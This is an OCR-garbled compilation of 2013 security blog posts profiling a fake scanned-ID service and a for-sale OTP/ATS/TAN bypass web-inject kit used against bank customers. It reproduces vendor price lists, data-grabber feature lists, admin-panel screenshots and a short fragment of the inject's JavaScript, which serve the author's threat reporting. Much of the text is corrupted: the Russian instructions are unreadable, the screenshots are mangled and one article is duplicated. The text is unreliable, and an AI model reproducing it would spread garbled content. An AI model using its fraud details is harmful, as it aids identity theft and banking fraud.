characteristics on the fake scanned documents, to avoid detection of a single pattern, all 
available as a service, as of June, 2013. 


Basically, what this service does, is to provide a DIY Web based interface where users 
can take advantage of the on-the-fly generation of fake scanned copies of identification 
documents such as passports/IDs or credit cards. According to the vendor, the service has 
an inventory of over 200 photos for passports and IDs, is completely randomizing multiple 
aspects of the generated scanned fakes, in an attempt to mitigate the probability of having 
an entire set of statically generated fakes, easily detected by, for instance, law enforcement. 


The vendor also claims that the service can generate a fake in approximately 40 sec- 
onds. Payment methods accepted? WebMoney, PerfectMoney, Bitcoin and Paymer. 


Sample screenshots of sample scanned fakes generated using the service, and offered 
as samples: 
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Sample screenshots of the fake scanned utility bills/credit cards generated using the 
service: 
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Variant_1 
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Variant_2 
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List of banks that you 
can order 


Amegybank 
Barclays 

Bnp 

Boa 
Capital_One 
Chase 

Cibs 

Citibank 
Citizens 
Commonwealth 
Harborstone 
Hfds 

Icba 

Nab 

Natwest 
Navy_Federal 
Nordstrombank 
Rbs 

Silverton 
Societegenerale 
Sparkasse 
Union_plus 
Union_bank 
Usbank 
Wachovia 
Wells_Fargo 
Westpac 
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Variant 1 Variant 2 Variant 3 
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Variant 1 Variant 2 Variant 3 
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ANOREA WHITE 

69 CROYLAND DRIVE Customer Reference Number: 8500 1435 3355 
BEDFORD Bill date 10 2013 

MK42 9GH 


Netowett 


Billing summary 
Billing period 14 Feb - 9 May 2013 


Good news - our gas rates have gone down again 
We have reduced our gas rates for the second time this 


Your tast bill £232.01 
— in cebit 
OurCommitmentto You j= = ~~ |" Pavnesistecelved.henkvoo °° ~*~«CESEOL 
To receive our Social Obligations leaflet, detailing a record = pga 


of the performance of British Gas regarding our social 
Obligations to customers, please call 0845 955 $200. Lines 
are open 8am to 8pm Monday to Friday, Barn to 6pen 
Saturday 


£232.01 Postal Payment 


Gas you've used £129.43 
(actual reading) Please turn over for detat 


Gas meter pone reference 91 54428507 


-_— 


Financial institutions part of the service’s inventory of fake scanned credit cards: 
- Amegybank 

- Barclays 

- Bpn 

- Boa 


- Capital One 
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- Chase 

- Cibs 

- Citibank 

- Citizens 

- Commonwealth 
- Harborstone 

- Hfds 

- Icba 

- Nab 

- Natwest 

- Navy Federal 

- Nordstrombank 
- Ros 

- Silverton 

- Societegenerale 
- Sparkasse 

- Union Plus 

- US Bank 

- Wachovia 

- Wells Fargo 


- Westpac 


With scanned IDs continuing to act as the primary (remote) identification factor for a 
huge number of legitimate companies, it shouldn’t be surprising that cybercriminals have 
apparently found a way to automate the process, allowing it to scale, and eventually grow, 
with the efficiency-centered model becoming the de factor standard for [3]Quality Assurance 
(QA) within the cybercrime ecosystem. 
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1. http://ddanchev. blogspot .com/2013/05/a-peek-inside-russian-underground.htm 
2. http://blog.webroot.com/tag/diy/ 
3. http://blog.webroot.com/tag/quality-assurance/ 


9.7.4 A Peek Inside a Managed OTP/ATS/TAN Token Bypassing/Hijacking/Blocking 
System as a (Licensed) Service (2013-07-19 22:43) 


.IFNB@OTPBypass Thu, 29 Nov 2012 15:09:47 (UTC) — Options 
Accounts Reports 
Delete AllReports Date Filter C Alltime G@ From: From First Bal To: ToL | Ar R k 1 


Report Date/Time Browser IP address Login (ID) Command State Message — 


2022-11-29 15:03:09 FF 127 1 qwel2 blocked block_fske_shown Block fake shown, return command 
2042-11-29 15:0; FF 127 1 qwelz wart cmd otp_ submited 


2012-11-29 15:02:3 FF 127,0.0,1 qwel2s 


. : FNB@OTPBypass Thu, 29 Nov 2012 15:10:43(UTC) Optior n out 
rT 
; Accounts Reports 
0 1 
Refres! Delete Delete All Command Block OTP Pa ait 1 
1i- of 
Last Login Time Login (10) Password OTP Current Command Last State IP Address Logs 
= 0° 2012-21-29 15:03:09 qwe123 qweqwe 123456 —_Login blocked Block fake shown 127.001 23 


One of the most common questions that | get during Q &A sessions after a PPT, or in a face- 
to-face conversation is - "Hello, my name is [name], | represent [random financial institution]. 
Are we being targeted based on your situational awareness?" 


For years, virtually every company, every brand, every financial institution has been tar- 
geted, largely thanks to the rise of Crimeware-as-a-Service underground market propositions 
offering standardized and cybercrime-release friendly 'Web Injects’, the result of active 
pre-sale reconnaissance performed on the E-banking service of the targeted institution. The 
business model is fairly simple - next to ‘pushing’ a pre-defined set of ’Web Injects’ for some 
of the largest and well known financial institutions in the World, ‘Web Injects’ for virtually any 
SSL/Two-Factor Authentication enabled Web site, can be requested and produced on demand, 
usually for a static amount of money. 


"But we issue two-factor authentication tokens to our customers. Isn’t this making any 
change?" 


Sophisticated cybercriminals possessing ‘innovative’ underground market disrupting forces, 
have been [1]undermining two-factor authentication for years. An uncomfortable truth that 
your financial institution of choice wouldn’t necessarily want you to know about, as it would 
most commonly [2]risk-forward the responsibility to you, under a contractual agreement, or 
actually possess an industry-accepted certification for the operation of such online services, 
thanks to the introduction of two-factor authentication, and the internal security measures 
preventing a direct compromise of the financial institution’s infrastructure. 
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With source code for the [3]ZeuS crimeware, as well as [4]Carberp, publicly available 
for virtually anyone to download, it [5]shouldn’t be surprising that [6]cybercriminals have 
started to release more crimeware, using these prominent releases, in an attempt to quickly 
capitalize on the source code that’s been contributing to a huge percentage of the profitability 
of the cybercrime ecosystem in general. 


What are some of the latest ‘innovations" in the world of Cybercrime-as-a-Service, in 
particular the market segment for "Web Injects"? Are cybercriminals striving to produce 
ZeuS/Carberp like underground market "products", or are they attempting to disrupt the 
entire cybercrime ecosystem by offering a standardizing E-banking Web site reconnaissance 
services, that would work on virtually any publicly obtainable/leaked source code based 
crimeware/malware release? 


That’s exactly what the cybercriminal whose underground market proposition I’m about 
to profile, is doing - offering crimeware-independent standardized on demand "Web Injects", 
in particular OTP (One-Time-Password), ATS (Automatic Transfer Service), TAN (Transaction 
Authentication Number) bypassing/hijacking/blocking system, or in those cases where the 
customer demands - offer "finished crimeware products"? 


Sample automatically translated underground market proposition: 


| am writing to inject custom-made as well as offer finished products. 


The main provisions of the Service: 


1. 


Tools manufactures both private and public products. 


1.1 Under the private means software products manufactured "in one hand" with the full right 
to transfer and resale. 


The client of the right to require the source code private product. 


Support for the private software somewhere executed in priority order. 


1.2 If the "privacy" of the product is not stipulated in advance that product becomes the default 
public service and the right to sell it to other customers. 
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1.3 Prices for private products involve premium of 50 % to the price of the underlying / social 
product. 


1.4 Distribution / Transmission of any parts of the code or of the products purchased on the 
basis of the public, will result in a denial of service on all products purchased from third-party 
service, followed by filing a complaint in section Black List. 


1.5 Public products are delivered on an "as is," and do not include its value of any additions or 
changes. 


1.5.1 Any changes to the products are made public as an additional order and measured in 
accordance with the workload. 


1.6 Service does not run on the lease terms. 

Only a piecework basis! 

1.7 Service does not give advice about cross-translation, relevance or affine those topics. 
For providing information about banks / cantor Service is not responsible. 

2. 


Service is responsible for the performance of the paid code for the negotiated period. 


2.1 If the period of service is not verbalized it enters into force standard warranty period is 10 
days from the date of issue of working product. 


3: 


Warranties: 


3.1 The Service shall recover from the purchased products for a specified warranty period, for 
that is technically possible. 


Free of charge - during the warranty period, and the charge on the expiration of the warranty 
period. 


Prices for the repair of products range from $ 10 up to the full cost of the product and depend 
directly on the volume of the work. 
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3.2. 


Service is not responsible for the failure of performance caused by the code: 


3.2.1 The introduction of third-party software which prevents full operation. 


(Rapport) 


3.2.2 The introduction of sms / email notifications that can not be disabled by means 
of injection. 


3.2.3 The introduction of this activity exhibiting malicious code (without the possi- 
bility of elimination) 


3.2.4 The other changes in the source code of banks / sites prevent recovery of the product. 


3.3 The Service does not guarantee a return to work ordered acquired products, but only can 
guarantee the performance of the software according to the negotiated terms of reference. 


4. 

Approximate prices for soft (public foundation) 

grabber balance of $ 10 (1 unit) 

popup $ 70 

Fake full page from $ 150 

repleyser from $ 450 (3 units each include an additional $ 50 .. 100) 
grabbers data from 150 $ 

Automated OTP/ATS/TAN from $ 2500 


Sample explanation of the service in action, courtesy of the cybercriminal behind it: 
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Rooporo epemenn cyToR 

Ceronma a noneey nan pabotaeT cxcTema o6xona ToRnena 

AAR BOMANA OCHOBMme NoOnOKeNKA KH ROMANE 

Block ~- safnonnponats xomepa 

OTP = sanpoceTs Toren 

Vait - c6poceTs cratyc ana Toro uTotm npx MOBTOpHMOM BxONe MMEENT CTapTroBan sanona 


Pass - nponycTeTs » annaynT 


we~evwauwse ON 


BxOnM B an 

a ypenmuy na a Taiepy ))) 

il ARMA MO“AnA A MORAKy CHTyaleD: KOMmA Bac NET y ROMNA M KOMAMEM Me MOcTynaNT. B >TOM Cayune xomnepu GynyT crodonmo 
2 mpoxonmTs 8 Chom anmaynTK (eCAm TOMDKO OK He SabnORKpOBAMN panee) -- T.€. BXON B ARRAYHT NO TalayTy 

12) omy Kar seo sreoumaca Taliep KM mEEeNT meT ROMANEM. eCaM C@ Me NOCTynET TO cpafoTaeT TaitayT x xOmmepa MycTHT B anxaynxT 
14 «TAK ROR xORmep HOEMA M ON paKee Me Zab nORKpORaN 

1S *6monmpomma ncoTaTn MEET TO ROPMMY. 

16 & SpA a Taiepe yremruxn } 

1? «KcTaTx B STOT MOMENT (KOPDRA XOAMEP BxoANT B an) Bam B xaGGep npximéT coofmenne 

18 my « CooTReTCTBymmAA Sanncd ROABHTCA B ROPE (cHOTPIOC) 

19 «RAK BMaHM B HOPE OTOOpareno “TO xoamep BOwEA B ANKayHT mo TaiMayTyY. My RAK RAK anayeT mooanten so nonyuxnrK omMiny oO 
NEBePMOM NOPE KAK NApone 

Tpx nocnexynwek momeTne noktx xonmnep GyneT npomycnaTeCA B ARRGYHT. TAK RAR Ceweac MANpOTHE Hero CTONT noMalIA 
“nycTuTs 5 an” (Pass) 

npopepms 

nan sane Ges Takepon ux cpasy “nycTuno B ax” (ONATD me ME NYCTHMO MOTOMy “TO AOPHN mM NAC NeECyHeCTEyxumnt) 

My % B ROPE AOREKO Cuno OTpasETS OTH ReoTEKA 

Teneps sabnonupyem STOT annayneT. Crhewem TAK 2a TOPO “Totu nponepeTe oan )) 

Npopepmm uTo OyneT ecan xommep nomuTactca soxTH B sabmONKpOBarnt annaynT 

37O KC MONO BMMOAMNTS BO BpeMA CRMEANKA KROMANEK 

cOpocm amnayrr ma sanpoc em# pas 

TO CCTD BD AGHINK MOMENT HICEERT ORDGET OT HAC RanHx AKOO moMMant 

CKAEEM TAK: Ma ceduac nomponmx 5 xaSOep AOPKM M NApoRD sama B annayHT m Gamanc STOPO ANKayHTa mam Me noNpasnacd 
AOU KoMaumy a Gronupomny ara 


~ 
o 


°o 


wenn nnn tw tw & ft 
vows On & wh pe 


w 
- Oo 


“ 
Ps) 


22 wan sxnom Ges Taieepos x cpasy “mycTHno B an” (ONATD me ME NYCTHRO NoTOMy “UTO AONKH mM TAC MNeCyINeCTEyxuai) 
2S wy * B nore ZomeKo GNAO OTpasNTD OTK HewoTeHA 
26 Tenepp sabxonupyem STOT annaynT. chaxem Tan ana Toro “Tom nposepuTs gouR )) 
2 nponepm uTro GyneT ecan xonmep nomeraetca sodTH B saSmonxponamd annayrT 
2 DTO He MONO BNNOAMHTD BO BPeMA CHEMNANKA ROMANUM 
29 «cOpocmm annaynT na sampoc eu#t pas 
30 TO ect B Ramm MOMENT MecKERT CaHKIAeT OT MAC KARMX AxGO KoMMaHT 
Si ocheceem Tan: «x cewuac momyuxnx 5 xaSGep Aor * NApORD 3amMAK B aknaynT * Oamanc DTOrO AXKayNTA MAX He NoNMpanuncaA. 
$2 “sro nenatTs? zanakre saSnmonupyem ero 
33 «4 MoTOM Toxe Camoe TORDRO npomycTIe ero B annayntT (Gynen noGpee) 
34 ran seam Gor ycremmo momyunn momamny » go0%m Gun oTOOpaxtn. cooTBeTcTEBeNMO Bct >TO Gun oTOOpareno B nore 
35 
36 mpx mocnenyxeex pxone onaTs xe GyneT nonxazan qou%n Oronnponnn 
37 «6cbpocim 
96 Temeph mane nomanny “mpomycTxTS B an” K Rpsovepy MM Samix OM MAM ME TOMpPABXACA My  UTOG Me BACTABNATS xOANepAa mcnxoRaT 
39 «Mt pewunx ero nponycTerT> 5 an 
40 
Si omy * Canoe "BKycHOe” Banpoc Tonena 
42 RAN BxOOM TOReN npmmen (Tax xe » B enbGep) my x GoT mnéT KoMaMMy. ECAH ONATD He Me RATS KOMAIMY TO Sanpoc ToReHa 
4) pecrapranétca « ToReH onaTs GyneT sanpowen. 
44 me Gynem mnaTe TamayTa sanpocm Tonen eutpas. mK nprerepy Sor max nan Mepepmmk TONeN mM Oann Ma Mero pyrmyaca 
45 antax Gar ) 
46 mponepam ewe pas (caazanmit c AOnaxbmotwx TajorayTaMx a Smpoc KomMannM, B Goenom peximre on GynyT Gomee cenyrt) 
4?) omy Bor Ran BMaI MOPTOpI sanpoc Tomena. mM TAK MONO ZOnOeTD XOMMEpA MoMA ON Me AAcT myxIed TOReN Mona on Ne noOjetT 
40 “ro mano BronuTs Tonen 4 ne 123456 
49 ppeném Toren emt pas 
SO my ™ K npserepy ma >TOT pas Gun srentm sepia TOKEN. My M SAQNME Nam yWER. “TO ZeENATD? ZyMaD CTONT saOxonmponaTs xonmmepy 
Si sxom “Tob sannm 6Graromomyuno nomen 
2 my Bor M Ect? KcTATH MoxMO GuZO RaTD K Apyrxe KoManay. K Npexepy me Ratt Gann saxkTD my K BCe TYT. “TO Renata? na npony 
SS xonmepa 5 ax nycTS TyCyeTCA. My MAM ONATD Sa SanpoceTS TOKEN nO HOBO. 
54 
SS ¢ naxx Gun GEseegecero xopowero « ycnexon = patoTe 


Sample screenshots of the service in action: 
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{© Home - First Notional Bank - FNB 
¢ @ toss! tnd.co.zale 


Contact 


fbn - Mozilla Firefox Folxd| Loon ® 
i | ; loo Help Regster 
al () fon : Go @ 


€ ) bcahostiteniiede.phe 
mee how cans 


| FNG | Ondine Assistance | Fraud Prevertion | Home 


Home r f . 
Thu, 29 Nov 2012 14:45:30(UTC) Optons Sign out 


:[ Block Ss Pass || Wat 


No records is database 


PSsage 


More Fromotons eel (ii chaelJordaan wet 


var OTPBypass = ( function()( 


[[ ennwnennnscnncennnnnsecsnnenecscsssssces 


CN dada Lda alld edule dadlteladadadadaesladudadadededeledaded 
//## >> USER VARIABLES 
Geen ddd dad adataeladda dada dadedededadadadadadededdeladadadedededadad 


//--- USER VARIABLES --- 


WOON ans eonwe 


~ 
oc 


var home_link © “http://localhost/fbn"3 
var gate_link = home_link+"/gate.php": 
12 var pkey = “HcSrwill": 

i3 var wax_login_wait_cmd seconds = 30; 

“4 Var wax _otp_vait_cmd seconds = 

is var login_vait_cmd_command timeout = 1; 
16 var Otp_wait_cmd command timeout = 1; 


- 
- 


18 TAA dL idididudadadadadudihidadadadaducabihidaddadedatahidadadodududbabadadahadudadshaddadadadudsladedadiledaladedededidedadadadeledalal 
i9 //8# >> DETECT BROWSER 
20 Neild dada hide adalah adadadadedabhidadadadaidebshidadadadadadosledaded 


21 

22 function detectBrouser(){ 

23 Aaf( navigator .userAgent.toLowerCase().indexOf("meie 6") >= Of 

24 roturn "TES"; 

25 Jelse if( navigator. userAgent.toLowerCase().indexOf("msic 7") >= O{ 
26 return "IE7": 

27 Jel#we i2f(navigator.userAgent.toLoverCase().indexOf("msie &") >= Of 
28 return “IEO"; 

29 Jelse if(navigator.userAgent.toLowerCase().indexOf("msie 9") >= Of 
30 return “IE9"; 

31 Jelse if(navigator.userAgent.toLowerCase().indexOf("firetox") >= Op¢ 
32 return "Fi"; 

33 jelse( 
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¢ @ bets: //wow frib.covzale 


Contect 
Connecting to authentication Server. This may take a few minutes. (00:13) 


FN = Prevx SateOnire™ Reset access detais Terms and Conditions Verity paymerts Regster 
o— . 
ft . 


| ENB | Ondine Assistance | Freud Prevertion | Home 


— bn - Mozilla Firefox 


? 
how can we help you? Flas 


6 © CD lecahostitienvinder phe Cl fm #:- &- 


Aenaneeommeeereee | 


.fbn@OTPBypass Thu, 29 Nov 2012 14:49:51 (UTC) Options —_ Sign out 


Home 


Accounts Reports 
‘Delete Ali Reports | Date Filter © Alltime @ From:|From First S]To: ToLast  S] Apply/Refresh | [Gl 


Report Date/Tiene Browser IP address Login (ID) Comenand State Message 
2012-11-29 14:48:05 fF = :127.0.0.2 qwei2s waremd logining ese tries to login with login: qwel23, and password: 


| we, return command: Wait for commands 
Up to 15% reward on | 


Gi Tablets & Smartphon 


Planning a holiday 


ED Petos://owww. fr.co.20/# 


Comtect | FNB | Criine Assistance | Fraud Prevention | Hone 


Bank Online — qwet23 eeeeee Login (3) 
Prevx SateOnire™ Reset access detats Terms and Corditions Verity payments Register 


fom - Mozilla Firefox 


.fbn@OTPBypass Thu, 29 Nov 2012 14:50:14 (UTC) Options —Segn out 


Accounts orts 
“Delete All Reports | Date Filter © Alltime @ From: |From First To: To Last 


Report Date/Time Browser IP address Login (ID) Command State Message 


S| Apply /Refresh | El 


2012-11-29 14:50:05 rr 127.0.0.1 qwel23  pass_to_account logined Holder logged in, return command: Pass 
bot to account 


2032-31-29 14:50:05 fF 127.0.0.1 qwel23  pass_to_eccount logining_timedout Login wait command timeout, return 
command: Pass bot to account 

2012-11-29 14:46:05 fr 127.0.0.1 qwel23  wait_emd logining Holder tries to login with login: qwei23, 
and password: qweqwe, return 
command: Wait for commands 
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Contest | FN | Onine Assistance | FrauiPrevertion | Home 


a 


1270.01 


2012-41-29 14: 


2012-11-29 14:52:01 


2012-11-29 14:50:08 
2012-11-29 14:50:05. 


2012-11-29 14:48:05. 


Lid 


Lid 


id 


'127.0.0.1 


'127.0.0.1 
'127.0.0.4 


‘1270.0. 


" wait_emd 


" pass_to_account logining 


| pass_to_account logined 


oink 


_Pass bot to account | 
Holder tries to login with login: qwel23, 
and password: qweqwe, return 
command: Pass bot to account 

Holder logged in, return command: 
Pass bot to account 


' pass_to_account logining_timedout Login wait command timeout, return 


command: Pass bot to account 


Holder tries to login with login: qwei23, 
and password: qweqwe, return 
command: Wait for 


Block - sa6nonmuponaTs xonzepa 
OTP = sanpocxTs Tonen 


Vait - cOpocuTs cratye 24a Toro “TOGM opx nopTopHom pxome mIEKeNT CTapToORan sanona 
Pass - nponyctwT) » axnaynT 


OpPoxosuT> B Chom 0 


MenepNom normMe 1 
pm nocnenyrwea 
“nycTuTs pan” (P 
nponepam 

Ran pum Ges Tat 
“Ny MB AOPe ROH 
Teneps sabnonupye 
nponepsm uro Gyze 
370 =e MOuENO BENTO 
cOpocem annaynT 
TO ecTS B mam 

Chaxem Tam: mu ce 
“TO RenaTD? Zanak 
& nOTOM Toxe Cano 
ran Bom Gor yon 


ia Up to 15% reware, 
Ch. Tatiets & Smartp 


Planning 3 hotdal 


afte 


Thu, 29 Now 2012 14:56:30(UTC) Options _ Sign out 


Alitime @ From: |From First J To: |To Last 


it 


Apply / Refresh | = 


2012-11-29 14:56:00 


am 14:54:50. 


2012-11-29 14:53:42, 


2022-23-29 14:53:42 


2012-11-29 14:82:01 


2022-24-29 24:52:03 


127.0.0.3 


127.00. 


} 127.0.0.14 


27.0.0. 


1270.01 


1270.04 


qwel23 


qwrei23 


“qwei23 


qweiz3 


qwel23 


qwei23 


wait_omd “logining 
“blocked 
blocked | loging 


pass_to_account logined 


pass_to_account loging 


Cortact 


block_fake_shown Block fake shown, return command: 


] block_fake_shown 


Login blocked 


return command: for commands 


Block fake shown, return command: 
Login blocked 


Holder tries to login with login: 
Qwei2s, and password: qweawe, 
return command: Login blocked 
Holder logged in, return command: 
Pass bot to account 


Holder tries to login with login: ' 
Qwei2s, and password: qweawe, 
return command: Pass bot to 

account 


| PNB | Ondine Assistance | Freud Prevertion | Home 
£ Connecting to authentication Server. This may take a few minutes. (01:50) 


Prevx SateOnien™ Reset access detals Terms and Coraitions Verify paymerts 


Thu, 29 Nov 2012 14:59:16 (UTC) | Opbons | Sign out 


| Delete All Reports | Date Filter © All time 


2012-11-29 14:59:07 
2012-11-29 14:59:07 
2012-11-29 14:58:49. 


2012-11-29 14:56:38 


2012-11-29 14:58:02 


2012-11-29 14:57:57 


2012-11-29 14:56:00 


id 


Lid 


fF 


rr 


fF 


fF 


1270.0. 
"127.0.0. 
"327.004 


127.0.0.4 


127001 


127.00.3 


127,001 


qwel23 


“qweiz3 


“qwei23 


qwei2z3 


qwel23 


qwei23 


qwel23 


@ From: From First S]To: Toast S) Apply/Refresh | a 


| wait_ond 


pess_to_account logined 


waitond logineng 


blocked 


block_fake_shown 


Messoge 
OTP token subrnited, return 
comenand: Wait for commands 


ee 


OTP Request fake shown, return 
command: Request OTP 

Holder tres to login with login: 
qwel23, and password: qweqwe, 
return command: Wait for commands 
Molder logged in, return command: 
Pass bot to account 

Holder tres to login with login: 
Qwe123, and password: qweawe, 
return command: Wait for cornmands: 
Block fake shown, return command: 
Loain blocked 
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Sample screenshot of the ATSEngine in action targeting HSBC: 


«=hsbc@ATSEngine Sat, 24 Nov 2012 10:58:32 (UTC) | Options | Sign out | 

| Accounts Drops Reports Transfers 
Refresh Il Delete Account |__ Delete All Accounts Be 2 | Next || Hide Bottom Panel | 

|| Last Login Time | Login (ID) | Security Answer | IP Address | ATS State |Grabbed | Transfers | Logs 
2012-11-24 10:51:25 chamarthi Undefined 1 ft) 11 
2012-11-24 10:46:32 ebenezer Undefined 3 1 41 
2012-11-24 10:27:17 flat punto Undefined 1 0 33 
2012-11-24 10:17:54 Santorini Undefined qd 0 72 
2012-11-24 09:37:38 ferrari Undefined a 0 43 
2012-11-24 09:05:48 Logging in 0 0 2 
2012-11-24 07:52:26 kostowiec Undefined 3 0 81 

|| 2019-11-24 02-07-25 inblecs Undefined 1 a "1 

| 

Grabbed Data Transfers Reports 

[ Refresh || Add Transfer || Edit Transfer [ Delete Transfer | 

‘Transfer Date Login (ID) Holder Account Nr.| Drop Name | Drop Account Nr| Drop Sort Code Transfer Memo (RegExp) | Amount 

22.11.2012 aT Taare MO server repair 2419.03 


Some of the most recent updates to the system include: 


01/11/2012 

- Sets 

fullinfo 

grabbers 

for 

AU ( 37 banks 

)/ CA (30 banks 

)/ US ( 40 banks ). Data on 

Holder to 

SSN /MMN /DOB/DL/DL exp/VBV ... 


01/11/2012 - 
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Grabbers 
CC + VBV (paypal, ebay, amazon, facebook) 


01/11/2012 

- The system 

change 

number and 

Grabing 

necessary 

disk imaging 

(input issues , balance sheets) for the Gulf 
santander.co.uk ( instant on 
UK 

to 

10kGBP ) 


02/11/2012 

Grabber 

additional data for 

paypal (DE / UK /AU / 

with 

the possibility 

to add 

other countries ). Collects : Name 
Holder , Balance , Status ( verif / 
neverif ), Account Type , Time of the last 
entry 

, aS well as 

rooms full 

of affection 

card and / 

or 

bank 

accounts 

for the 
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AU 

and the 

UK, 

and questions 
with answers 
for 

DE 


13/11/2012 
Grabber 
TANs 

to 

ipko.pl 


23/11/2012 
Avtozaliv 

on 

hsbc.co.uk 
23/11/2012 
Grabber 

cc + cvwy + exp + pin. 
works 

on all pages 

on which the 
algorithm 

finds 

on 

LUHN10 

card number and 
exp 

field and 

collects 

requests 
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PIN 


11/29/2012 
intercept system 
ra 

bypass 

token 

to 

fnb.co.za 


Two-factor authentication - indeed, an additional layer of security for your E-banking account, 
however, everything changes on a crimeware-infected host, and sadly, it changes in favor of 
the cybercriminal that compromised it. 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]on Twitter. 


ttp://www.zdnet .com/blog/security/modern-banker-malware-undermines-two-factor-authentication/4402 


ttp://www.zdnet.com/blog/security/no-security-software-no-e-banking-fraud-claims-for-you/1158 


ttps://www.google.com/#output=search&sclient=psy-ab&q=site :ddanchev. blogspot .com+zeus 


ttps://blogs.rsa.com/the-carberp-code-leak/ 


ttp://blog.webroot .com/2013/03/14/new-zeus-source-code-based-rootkit-available-for-purchase-on-the-unde 


Sis We Nr 


a 


ttp://blog.webroot.com/2013/06/27/self-propagat ing- zeus- based-source- codebinaries-offered-for-sale/ 


7. http://ddanchev. blogspot .com/ 
8. http: //twitter .com/danchodanche 


9.7.5 A Peek Inside a Managed OTP/ATS/TAN Token Bypassing/Hijacking/Blocking 
System as a (Licensed) Service (2013-07-19 22:43) 


. I FNB@OTPBypass Thu, 29 Nov 2012 15:09:47(UTC) Options _ Sign out 
Accounts Reports 
Delete AllReports | Date Filter C Alitime @ From: From First ¥]To: To Last =] Apply / Refrest 1 
Report Date/Time Browser IP address Login (ID) Command State Message a 
2012-11-29 15:03:09 FF 127.0.0.1 qwei23 blocked block_feke_shown Block fake shown, return command 
Login blocked 


2012-11-29 15:02 FF 127.0.0.1 qwelz wart_cmd otp_submuted OTP token submited, return 
command: Wart for commands 

2012-11-29 15:02:30 FF 127.0.0.1 qwei2s otp otp_submuted OTP token submited: 123456, return 
command: Request OTP 


2012-11-29 15:01 


:: FNB@OTPBypass Thu, 29 Nov 2012 15:10:43(UTC) Options — Sign out 
2012-11-29 15:01 
; 7 Accounts Reports 
2012-11-29 15:01 
Refresh Delete Delete All Commands Block OTP Pa Wait 1 
2012-11-29 15:00 
Last Login Time Login (10) Password OTP Current Command Last State IP Address Logs 
eURe-LE 07 29100 2012-11-29 15:03:09 qwel23 qweqwe 123456 Login blocked Block fake shown 127.0.0.1 23 
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One of the most common questions that | get during Q &A sessions after a PPT, or in a 
face-to-face conversation is - "Hello, my name is [name], | represent [random financial 
institution]. Are we being targeted based on your situational awareness?" 


For years, virtually every company, every brand, every financial institution has been tar- 
geted, largely thanks to the rise of Crimeware-as-a-Service underground market propositions 
offering standardized and cybercrime-release friendly ‘Web Injects’, the result of active 
pre-sale reconnaissance performed on the E-banking service of the targeted institution. The 
business model is fairly simple - next to ‘pushing’ a pre-defined set of ’Web Injects’ for some 
of the largest and well known financial institutions in the World, 'Web Injects’ for virtually any 
SSL/Two-Factor Authentication enabled Web site, can be requested and produced on demand, 
usually for a static amount of money. 


"But we issue two-factor authentication tokens to our customers. Isn’t this making any 
change?" 


Sophisticated cybercriminals possessing ‘innovative’ underground market disrupting forces, 
have been [1]undermining two-factor authentication for years. An uncomfortable truth that 
your financial institution of choice wouldn’t necessarily want you to know about, as it would 
most commonly [2]risk-forward the responsibility to you, under a contractual agreement, or 
actually possess an industry-accepted certification for the operation of such online services, 
thanks to the introduction of two-factor authentication, and the internal security measures 
preventing a direct compromise of the financial institution’s infrastructure. 


With source code for the [3]ZeuS crimeware, as well as [4]Carberp, publicly available 
for virtually anyone to download, it [5]shouldn’t be surprising that [6]cybercriminals have 
started to release more crimeware, using these prominent releases, in an attempt to quickly 
capitalize on the source code that’s been contributing to a huge percentage of the profitability 
of the cybercrime ecosystem in general. 


What are some of the latest ‘innovations" in the world of Cybercrime-as-a-Service, in 
particular the market segment for "Web Injects"? Are cybercriminals striving to produce 
ZeuS/Carberp like underground market "products", or are they attempting to disrupt the 
entire cybercrime ecosystem by offering a standardizing E-banking Web site reconnaissance 
services, that would work on virtually any publicly obtainable/leaked source code based 
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crimeware/malware release? 


That’s exactly what the cybercriminal whose underground market proposition I’m about 
to profile, is doing - offering crimeware-independent standardized on demand "Web Injects", 
in particular OTP (One-Time-Password), ATS (Automatic Transfer Service), TAN (Transaction 
Authentication Number) bypassing/hijacking/blocking system, or in those cases where the 
customer demands - offer "finished crimeware products"? 


Sample automatically translated underground market proposition: 


| am writing to inject custom-made as well as offer finished products. 


The main provisions of the Service: 


1. 
Tools manufactures both private and public products. 


1.1 Under the private means software products manufactured "in one hand" with the full right 
to transfer and resale. 


The client of the right to require the source code private product. 
Support for the private software somewhere executed in priority order. 


1.2 

If the "privacy" of the product is not stipulated in advance that 
product becomes the default public service and the right to sell it to 
other customers. 
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1.3 Prices for private products involve premium of 50 % to the price of the underlying / social 
product. 


1.4 

Distribution / Transmission of any parts of the code or of the products 
purchased on the basis of the public, will result in a denial of 

service on all products purchased from third-party service, followed by 
filing a complaint in section Black List. 


1.5 Public products are delivered on an "as is," and do not include its value of any additions or 
changes. 


1.5.1 Any changes to the products are made public as an additional order and measured in 
accordance with the workload. 


1.6 Service does not run on the lease terms. 

Only a piecework basis! 

1.7 Service does not give advice about cross-translation, relevance or affine those topics. 
For providing information about banks / cantor Service is not responsible. 

2; 


Service is responsible for the performance of the paid code for the negotiated period. 


2k 

If the period of service is not verbalized it enters into force 

standard warranty period is 10 days from the date of issue of working 
product. 


3. 
Warranties: 
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3.1 The Service shall recover from the purchased products for a specified warranty period, for 
that is technically possible. 


Free of charge - during the warranty period, and the charge on the expiration of the warranty 
period. 


Prices 
for the repair of products range from $ 10 up to the full cost of the 
product and depend directly on the volume of the work. 


3.2. 


Service is not responsible for the failure of performance caused by the code: 


3.2.1 The introduction of third-party software which prevents full operation. 
(Rapport) 


3.2.2 The introduction of sms / email notifications that can not be disabled by means 
of injection. 


3.2.3 The introduction of this activity exhibiting malicious code (without the possi- 
bility of elimination) 


3.2.4 The other changes in the source code of banks / sites prevent recovery of the product. 


3.3 

The Service does not guarantee a return to work ordered acquired 
products, but only can guarantee the performance of the software 
according to the negotiated terms of reference. 
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4. 


Approximate prices for soft (public foundation) 
grabber balance of $ 10 (1 unit) 

popup $ 70 

Fake full page from $ 150 


repleyser from $ 450 (3 units each include an additional $ 50 .. 100) 
grabbers data from 150 $ 
Automated OTP/ATS/TAN from $ 2500 


Sample explanation of the service in action, courtesy of the cybercriminal behind it: 
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Heoporo spemenn cyTorn 

Ceronma A nonexy ran paboTaeT cxcTema o6xona Tomena 

AAA HOMGNS OCCHOBINEt NOACECHKA HM ROMAMEN 

Block ~- saimonnponaTs xongepa 

OTP - sanpoceTs Toren 

Vait - cOpocxTs cratyc ana Toro uToGm mpx MOBTOpPNOM BXONe MMKEXT cCTapTronan sanmona 
Pass - OpomycTeTh © annayuT 


BXONKM B an 

a yeenmuy no a Taknepm ))) 

ARA HOWANA A TORREY CHTyaINeD: KOrRa Bac NET Y ROMTA M KOMAMEM Me MOCTyNaNDT. B >TOM cCmyuae xomnepu GynyT croGonmo 
